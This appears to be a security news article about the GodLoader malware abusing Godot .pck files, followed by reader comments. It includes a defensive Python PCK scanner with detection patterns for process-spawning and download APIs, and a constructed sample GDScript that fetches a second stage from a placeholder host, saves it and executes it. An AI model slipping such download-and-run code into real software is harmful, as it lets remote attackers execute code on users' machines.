Threat actors have used a new malware loader, GodLoader, that abuses the widely used Godot game engine to evade detection, infecting over 17,000 systems in roughly three months.
As Check Point Research found while investigating the attacks, threat actors can use this malware loader to target gamers across all major platforms, including Windows, macOS, Linux, Android, and iOS.
The loader abuses Godot's flexibility and its GDScript scripting language to execute arbitrary code and bypass detection systems: the malicious scripts are embedded in the engine's .pck files, which normally package game assets, so the payload rides inside what looks like ordinary game data and is executed by a legitimate, signed engine binary.
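To make the mechanism concrete, here is an added example (not code from Check Point's report or from the Godot project) that builds a small .pck, parses it back, and flags embedded GDScript that calls APIs a game rarely needs but a loader does. It assumes the Godot 3.x PCK layout (format version 1: "GDPC" magic, version fields, 64 reserved bytes, a file count, then per-file path, absolute offset, size and MD5); Godot 4 packs use format version 2 and are rejected, and encrypted packs would not be readable this way. The indicator list and the sample scripts are my own constructions, not indicators published for GodLoader.

```python
import hashlib
import re
import struct
from typing import Dict, List

PCK_MAGIC = 0x43504447   # the bytes b"GDPC" read as a little-endian uint32
PCK_FORMAT_V1 = 1        # Godot 3.x pack format; Godot 4 writes version 2 (not handled here)
HEADER_LEN = 5 * 4 + 16 * 4 + 4   # magic, version, major, minor, patch, 16 reserved, file count

# Assumed indicator list (mine, not Check Point's): GDScript APIs that fetch a
# payload, write it to disk, or spawn a process.
SUSPICIOUS_CALLS = {
    "OS.execute": re.compile(r"\bOS\.execute\s*\("),
    "OS.shell_open": re.compile(r"\bOS\.shell_open\s*\("),
    "OS.create_process": re.compile(r"\bOS\.create_process\s*\("),
    "HTTPRequest": re.compile(r"\bHTTPRequest\b"),
    "store_buffer": re.compile(r"\.store_buffer\s*\("),
}


def build_pck(files: Dict[str, bytes]) -> bytes:
    """Write a minimal Godot 3.x PCK (format version 1). Keys are 'res://...' paths."""
    padded = {p: p.encode() + b"\0" * (-len(p.encode()) % 4) for p in files}  # 4-byte aligned
    index_len = sum(4 + len(pp) + 8 + 8 + 16 for pp in padded.values())
    data_offset = HEADER_LEN + index_len          # v1 offsets are absolute file offsets
    header = struct.pack("<5I", PCK_MAGIC, PCK_FORMAT_V1, 3, 5, 0) + b"\0" * 64
    header += struct.pack("<I", len(files))
    index, data = bytearray(), bytearray()
    for path, content in files.items():
        pp = padded[path]
        index += struct.pack("<I", len(pp)) + pp
        index += struct.pack("<QQ", data_offset + len(data), len(content))
        index += hashlib.md5(content).digest()
        data += content
    return bytes(header + index + data)


def parse_pck(blob: bytes) -> List[dict]:
    """Parse the v1 header and index; return each entry with its bytes and an MD5 check."""
    if len(blob) < HEADER_LEN:
        raise ValueError("truncated PCK header")
    magic, fmt = struct.unpack_from("<II", blob, 0)
    if magic != PCK_MAGIC:
        raise ValueError("not a Godot PCK (bad magic)")
    if fmt != PCK_FORMAT_V1:
        raise ValueError("unsupported PCK format version %d" % fmt)
    pos = HEADER_LEN - 4
    (count,) = struct.unpack_from("<I", blob, pos)
    pos += 4
    entries = []
    for _ in range(count):
        (plen,) = struct.unpack_from("<I", blob, pos)
        pos += 4
        if pos + plen + 32 > len(blob):
            raise ValueError("index entry runs past end of file")
        path = blob[pos:pos + plen].rstrip(b"\0").decode("utf-8")
        pos += plen
        offset, size = struct.unpack_from("<QQ", blob, pos)
        pos += 16
        md5 = blob[pos:pos + 16]
        pos += 16
        if offset + size > len(blob):             # treat out-of-range entries as hostile
            raise ValueError("entry %s points outside the file" % path)
        content = blob[offset:offset + size]
        entries.append({"path": path, "content": content,
                        "md5_ok": hashlib.md5(content).digest() == md5})
    return entries


def scan_pck(blob: bytes) -> Dict[str, List[str]]:
    """Map each script path inside the pack to the suspicious API names found in it."""
    findings: Dict[str, List[str]] = {}
    for entry in parse_pck(blob):
        path = entry["path"]
        if path.endswith(".gdc"):                  # compiled GDScript: regexes will not see it
            findings[path] = ["compiled GDScript (bytecode); inspect manually"]
            continue
        if not path.endswith(".gd"):
            continue
        text = entry["content"].decode("utf-8", errors="replace")
        hits = [name for name, rx in SUSPICIOUS_CALLS.items() if rx.search(text)]
        if hits:
            findings[path] = hits
    return findings


# Constructed sample pack: one ordinary game script, one loader-style script, one asset.
SAMPLE_FILES = {
    "res://player.gd": b'extends KinematicBody2D\nfunc _ready():\n    $Sprite.play("idle")\n',
    "res://loader.gd": (b"extends Node\nfunc _ready():\n    var req = HTTPRequest.new()\n"
                        b"    add_child(req)\n    req.request(\"http://example.invalid/stage2\")\n"
                        b"func _on_done(result, code, headers, body):\n    var f = File.new()\n"
                        b"    f.open(\"user://stage2.bin\", File.WRITE)\n    f.store_buffer(body)\n"
                        b"    f.close()\n    OS.execute(OS.get_user_data_dir() + \"/stage2.bin\", [], false)\n"),
    "res://icon.png": b"\x89PNG\r\n\x1a\n" + b"\0" * 8,
}

if __name__ == "__main__":
    for path, hits in scan_pck(build_pck(SAMPLE_FILES)).items():
        print(path, "->", ", ".join(hits))
```

Run against a real export, the scanner is a triage aid, not a verdict: a legitimate game can use HTTPRequest for leaderboards, and a loader can split strings or use `callv()` to dodge the patterns, so a hit should lead to manual review of the script rather than an automatic block.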
The attackers delivered the GodLoader malware through the Stargazers Ghost Network, a malware Distribution-as-a-Service (DaaS) that masks its activities using seemingly legitimate GitHub repositories.
Between September and October 2024, they used over 200 repositories controlled by over 225 Stargazer Ghost accounts to deploy the malware to targets' systems, exploiting potential victims' trust in open-source platforms and seemingly legitimate software repositories.
Over that period, Check Point detected four separate attack waves against developers and gamers between September 12 and October 3, each enticing victims to download infected tools and games.
Script kiddies. Not much has changed in the past 20 years, since people used Game Maker as a toolkit for building malware.
This is actually interesting in that one doesn't tend to think of game-engine scripts as being a threat vector. Most talk of scripting threats is in a corporate context where they wouldn't have such software, so it's, you know, common stuff like cmdlets, PowerShell, Python, C#, stuff like that, and locking that down in high-security environments is common. So it's a bit clever in that.